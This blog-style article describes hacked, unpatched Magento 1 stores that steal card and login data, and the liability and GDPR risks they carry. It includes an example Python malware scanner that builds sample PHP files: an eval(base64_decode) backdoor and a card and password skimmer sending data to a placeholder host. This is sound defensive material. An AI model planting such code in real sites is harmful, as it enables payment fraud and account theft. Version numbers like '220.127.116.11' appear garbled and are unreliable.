In this industry I come across a lot of Magento "rescues". These are typically Magento websites from the 1.4-1.9 era for which the client originally paid quite a lot of money to have an e-commerce site built, and which have since been left to stagnate.
Is it the Client's Responsibility or the Agency's?
Most of the time this is not the client's fault: they paid for a product and expect that product to stand the test of time. Unfortunately that is not how most software works, and it is especially not how Magento works.
It is more often the web agency's fault, for not making clear that keeping software up to date is a critical task, and therefore not building the cost of that maintenance into the website budget or into an ongoing support contract.
To take a typical example: Magento 1.9 was released in 2014. It is the last major version of Magento 1 and is now over four years old. At the time, a typical client would have paid their web agency, let's say, £10,000 to build a Magento CE website. The client would then have a hosting charge added to their monthly retainer, and perhaps some digital marketing on top of that.
Let's say for this example that the client has paid £10,000 for the website and is paying £250 per month for hosting and digital marketing. That is a lot of money, and quite rightly many Magento clients would assume it covers absolutely everything to do with their website and that it is a long-term investment.
But web agencies need to make a profit, so that hosting charge is typically just that: hosting. The website sits on a server and is accessible to the world. That is the role of hosting and that is what you pay for: space on a server and perhaps a shiny SSL certificate renewed each year.
And then it's left to age...
But unlike cheese or a fine wine, Magento websites do not age well. They rot, they develop holes, the world changes around them and, if left untouched, the software stays exactly the same.
Every day there are groups of attackers who "work" all day looking for these holes and exploiting them for gain, and Magento is a massive target. Would an attacker really pass up the chance to exploit your paying customers, capturing card details and other personal information? Of course not.
So a lot of Magento websites built in 2014 (or at any time, really, if they're out of date) are sitting there ready for attackers to walk in and siphon off credit card details. Or worse, they are already hacked and you just don't know it.
An example hacked Magento website
Recently I ran a malware scan on a referral client of mine, a "rescue" if you will. It was peppered with hacks, but from the front-end perspective everything looked fine and the website was fast and working well.
(To perform a Magento malware scan, follow the instructions here.)
However, when I looked into the hacked files that the malware scan threw up, I found what was really happening.
Here are a few examples of the files affected and what I gleaned from the injected code:
index.php (contains preg_match('//admin/Cms_Wysiwyg/directive/index//' and other code)
Yes, the root index.php was compromised. Looking at the code it is clear that this gives attackers a way into your website. Not only that, but the fact that index.php could be modified at all means the server itself wasn't up to the task of defending itself: a file that should be read-only to the web server was writable by whatever the attacker was running as.
This hack sends all user information to a third party. I mean ALL user data: credit card information and personal details.
Again, this one sends ALL user information straight to the attackers, including geo-location, IP address, name, billing address, card information, email address and date of birth: everything they need to impersonate your customers.
This hack sent the admin user details directly to the attackers. Every time you log in, they receive the username, password and URL (so they know the admin path). Changed your password? Great, next time you log in the attackers know it too. Rotating credentials achieves nothing while the code that captures them is still in place.
Similarly to the previous hack, this one intercepts your customers' email address / username and password every time they log in. Unfortunately most internet users do not use a unique password for every website, so the email/password combination may well work elsewhere (or worse still, for their inbox itself). So not only is your website compromised; now the customer is too.
Unfortunately this hack essentially just lays your website bare: the attackers now have access to your database credentials, your encryption key (in Magento 1 both live in app/etc/local.xml) and anything else they need.
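As an added example (this is not code from the original article, and not the scanner the article links to), here is a small Python scanner in the same spirit. It walks a Magento 1 document root, reports PHP files whose hash differs from a clean baseline or that are not in the baseline at all, and flags files matching injection patterns. The first signature is the preg_match on admin/Cms_Wysiwyg/directive/index quoted from the compromised index.php above; the other three (obfuscated eval, a hard-coded outbound URL, direct reads of the Magento 1 login/payment POST fields) are generic indicators assumed for this example, not findings from the article. The sample store, its baseline and the tampered files are all constructed inside the script.

```python
import hashlib
import os
import re
import tempfile

# Signatures. The first is the preg_match the article quotes from the
# tampered root index.php; the other three are generic indicators assumed for
# this example (obfuscated eval, a hard-coded outbound URL, direct reads of
# Magento 1 login/payment POST fields), not findings from the article.
SIGNATURES = {
    "cms_wysiwyg_directive_check": re.compile(
        r"""preg_match\(\s*['"][^'"]*admin/Cms_Wysiwyg/directive/index""", re.I),
    "eval_of_decoded_payload": re.compile(
        r"eval\s*\(\s*@?(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "outbound_http_literal": re.compile(
        r"""(curl_init|file_get_contents|fsockopen)\s*\(\s*['"]https?://""", re.I),
    "login_or_card_post_read": re.compile(
        r"""\$_POST\[['"](login|payment)['"]\]\[['"](username|password|cc_number|cc_cid)['"]\]""", re.I),
}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_file(path):
    """Names of the signatures that match the file's contents."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        text = f.read()
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_tree(root, baseline):
    """Check every .php/.phtml file under root against a clean baseline
    ({relative path: sha256}) and run the signatures over each one."""
    findings = {"modified": [], "unexpected": [], "suspicious": {}}
    seen = set()
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith((".php", ".phtml")):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            seen.add(rel)
            if rel not in baseline:
                findings["unexpected"].append(rel)       # dropped file
            elif baseline[rel] != sha256_file(full):
                findings["modified"].append(rel)         # tampered known file
            hits = scan_file(full)
            if hits:
                findings["suspicious"][rel] = hits
    findings["missing"] = sorted(set(baseline) - seen)  # known file deleted
    findings["modified"].sort()
    findings["unexpected"].sort()
    return findings


# --- Constructed sample store (not a real Magento install) -----------------
CLEAN_INDEX = "<?php\nrequire 'app/Mage.php';\nMage::run('default', 'store');\n"

# Tampered index.php: the clean bootstrap plus the check the article quotes,
# wired to a generic obfuscated payload purely to exercise the signatures.
INJECTED_INDEX = CLEAN_INDEX + (
    "if (preg_match('//admin/Cms_Wysiwyg/directive/index//', $_SERVER['REQUEST_URI'])) {\n"
    "    eval(base64_decode($_POST['p']));\n}\n"
)

# Dropped file that reads card and login fields straight from the request
# and sends them to a hard-coded host (reserved .invalid TLD, resolves nowhere).
DROPPED_EXFIL = (
    "<?php\n$d = array('cc' => $_POST['payment']['cc_number'],\n"
    "           'pw' => $_POST['login']['password']);\n"
    "@file_get_contents('http://collector.example.invalid/c?d=' . base64_encode(json_encode($d)));\n"
)


def write(root, rel, body):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as f:
        f.write(body)


def build_sample_store():
    """Write a tiny Magento-like tree, record the clean baseline, then tamper
    with it the way the article describes. Returns (root, baseline)."""
    root = tempfile.mkdtemp(prefix="magento_sample_")
    clean = {
        "index.php": CLEAN_INDEX,
        "app/Mage.php": "<?php\nfinal class Mage { public static function run() {} }\n",
        "app/design/frontend/base/default/template/checkout/onepage.phtml":
            "<?php echo $this->getChildHtml('login'); ?>\n",
    }
    for rel, body in clean.items():
        write(root, rel, body)
    baseline = {rel: sha256_file(os.path.join(root, rel)) for rel in clean}
    write(root, "index.php", INJECTED_INDEX)        # known file tampered
    write(root, "media/.cache.php", DROPPED_EXFIL)  # new file dropped
    return root, baseline


if __name__ == "__main__":
    root, baseline = build_sample_store()
    for key, value in scan_tree(root, baseline).items():
        print(f"{key}: {value}")
```

On a real rescue the baseline would be built from a pristine copy of the same Magento release (and of any extensions), not from the live server, since the live files are exactly what you do not trust. Signature hits are only a starting point: a file that is both modified against the baseline and matches a signature is almost certainly injected, but a clean-looking diff still needs reading by hand, because nothing stops an attacker wrapping the payload in code none of these patterns catch.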
Did the client know?
No. The client just wanted a few issues fixed on their website. It was a 220.127.116.11 and contained a few core bugs (like password mismatching when logging in, for example). My task was to fix these bugs; unfortunately what I found stopped me in my tracks.
What can be done - Magento patches?
A quick search showed that this Magento 18.104.22.168 was missing almost 20 patches. Not only that, but the site had no SSL certificate, the server itself had no SSL certificate, and generally the server was not secure.
The first thing I did was advise the client to cease trading: shut down the website, or at least the customer account and checkout areas. Drastic? I think not. What is more drastic, missing some sales or continuing to let all your data be harvested by attackers?
As for the cleanup, there are three main things to think about when attempting to correct a hacked website, and not all of them are under one company's control.
1. The server. The server needs to be top-notch, secure and maintained. A reputable company that specialises in hosting should be responsible for it.
2. The software. The software needs to be maintained, updated, fixed and constantly monitored (in some cases it may be best to start afresh).
3. The mindset. Yes, you can fix up a hacked website, but it then becomes a target, probably even more so once the attackers notice they can no longer reach it. Security therefore needs to be a main focus of your ongoing e-commerce strategy.
Who is liable?
A few months ago another agency contacted me with a similar problem. Their Magento website had been hacked: the checkout contained a very innocuous-looking credit card form, something that didn't look out of place. Customers had the option of either going to PayPal or entering their card information into the provided form. Just have a think about what percentage of people would opt for the credit card form.
The hack was harvesting credit card information. The ICO got involved and the owners of the Magento website were fined heavily after numerous complaints from customers that "after buying from this site my credit card details were stolen and used elsewhere".
Real-life customers can trace these problems back to a particular source. It's not make-believe: these problems exist, the fines certainly exist and the penalties are severe.
When a Magento website is hosted, unless specifically stated in the contract, the store owner is responsible for their data. A store owner may pay £50 per month for hosting, but if you do not host with a reputable provider who takes this sort of thing seriously, you are running a very large risk indeed.
Can a client pass on the responsibility for this to an Agency?
It would be a brave agency indeed that took on such a responsibility, but it is a question you could ask in the initial stages.
You will find many agencies and web hosting companies who push this back onto the client. In fact, a lot of web hosting companies in particular will not accept old, unpatched Magento websites at all. It's not really the liability that puts them off, but the hassle of cleaning up the mess for both the affected site and the others on the same server.
What about GDPR and Magento Hacks?
It was the same with GDPR: clients thinking GDPR was the web agency's responsibility, whereas the law makes it the responsibility of the business owner, as the data controller. (Thankfully, a lot of agencies leapt at the chance to recommend changes to their clients over GDPR in order to earn a few more development hours.)
GDPR specifically requires that customer information held on and transferred through your website is protected. So if you unwittingly allow your Magento website to become insecure, and allow attackers to harvest card details and other information because you did not take the necessary steps, you are liable.
And we all know that GDPR fines are serious business...
Do the hackers actually use this information?
The sad truth is that there is probably so much user data already stolen through hacks like these that the attackers have more than they can use. They'll be like kids in a sweet shop, surrounded by treats but feeling sick after a few Kit-Kats. Nevertheless, rest assured that the data is still out there somewhere, waiting to be misused.
So why is it so important to maintain your Magento website?
Security, pure and simple. It's not about "new features"; it's always about security.
If you imagine that your Magento website is actually your bricks-and-mortar store on the high street, the point should hit home.
When you accept visitors to your Magento website you are inviting them into your shop. If you've let your security lapse (the intruder alarms are broken, the CCTV is dead and there's no security guard looking out for suspicious characters) then you're left wide open.
Your customers, however, are browsing your aisles and everything seems fine: the shop is nice, the customer service is friendly, and the customers trust you and keep buying your goods.
Little do they know how ill-equipped the store is to deal with...
The credit card thief hiding in the corner, swiping details every time a transaction is made.
The identity thief hanging around outside the entrance, stealing people's names, addresses and phone numbers.
And the master criminal, dressed in black, hiding in your back office watching you key in the combination to your safe.
I'm not saying that all Magento websites, hosting companies and web agencies are culpable. There are plenty of fantastic Magento builds, hosting services and web agencies that take this seriously; lots and lots of people are doing the right thing.
What breaks my heart is that there are a MASSIVE number of hacked Magento websites out there, and a MASSIVE number of bad agencies, hosting services and Magento builds, all originally set up with the same promises and expectations. And a MASSIVE number of them are now victims of the problems outlined in this article.
Most with the store owner oblivious to any problem whatsoever.